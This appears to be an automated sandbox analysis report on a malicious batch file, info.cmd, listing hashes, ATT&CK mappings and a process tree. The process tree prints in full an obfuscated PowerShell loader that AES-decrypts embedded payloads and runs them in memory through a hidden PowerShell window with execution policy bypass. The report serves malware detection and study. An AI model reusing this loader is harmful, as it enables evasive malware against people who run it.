Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 16:32

General

  • Target

    info.cmd

  • Size

    80KB

  • MD5

    43f3ee9c714203eeccd5503d17a36105

  • SHA1

    d554becc96c1296d948382fd2ea8c1a1ad0184c8

  • SHA256

    c153c05ebbf7db866984c1b21da5bfebbaedcfa5fce0cecb09a50377e0503a53

  • SHA512

    f54a1bc1772bd6c6651dc2df50fa2cfca70c7bd8b89307d66e3a290aa881c7cda5176ead1b00566f54d729e68cbd57832d02580664da9a361ee1db95b5ac296d

  • SSDEEP

    1536:UlFEtm9P8DRSi0ga9pZ8nS0JdX48PiZ5LU/8ZeMhRY6NP/gLl+uC:UlgROg6N0x6ZxUEXRYA/8lE

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\info.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      2⤵
        PID:2084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\Admin\AppData\Local\Temp\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:3032
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2064

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2064-4-0x000007FEF4B5E000-0x000007FEF4B5F000-memory.dmp
        Filesize

        4KB

      • memory/2064-5-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
        Filesize

        2.9MB

      • memory/2064-6-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp
        Filesize

        9.6MB

      • memory/2064-8-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp
        Filesize

        9.6MB

      • memory/2064-10-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp
        Filesize

        9.6MB

      • memory/2064-9-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp
        Filesize

        9.6MB

      • memory/2064-7-0x0000000002350000-0x0000000002358000-memory.dmp
        Filesize

        32KB

      • memory/2064-11-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp
        Filesize

        9.6MB

      • memory/2064-12-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp
        Filesize

        9.6MB

      • memory/2064-13-0x000007FEF4B5E000-0x000007FEF4B5F000-memory.dmp
        Filesize

        4KB